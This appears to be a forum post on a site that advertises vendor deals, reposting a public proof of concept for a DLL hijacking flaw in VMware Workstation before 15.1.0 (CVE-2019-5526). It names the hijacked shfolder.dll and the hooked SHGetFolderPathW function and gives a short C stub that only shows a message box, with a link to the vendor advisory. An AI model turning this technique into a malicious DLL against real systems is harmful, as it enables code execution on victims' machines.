• ✨Always Use Forum Private Messages PM For Deal With Vendors✨

    Admin Contacts Jabber: megiddo@jabber.sk Telegram: @Megiddo1

VMware Workstation DLL Hijacking

✨ DeeZNuTz

✨ Master ✨
Staff member
Joined
May 15, 2017
Messages
982
Likes
760
Points
1,045
14uxusx.png



VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.

MD5 | e4ae43fff5271c25af6a88e2b9cdeb55

Download

Code:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------

https://www.vmware.com/security/advisories/VMSA-2019-0007.html
 
Top Bottom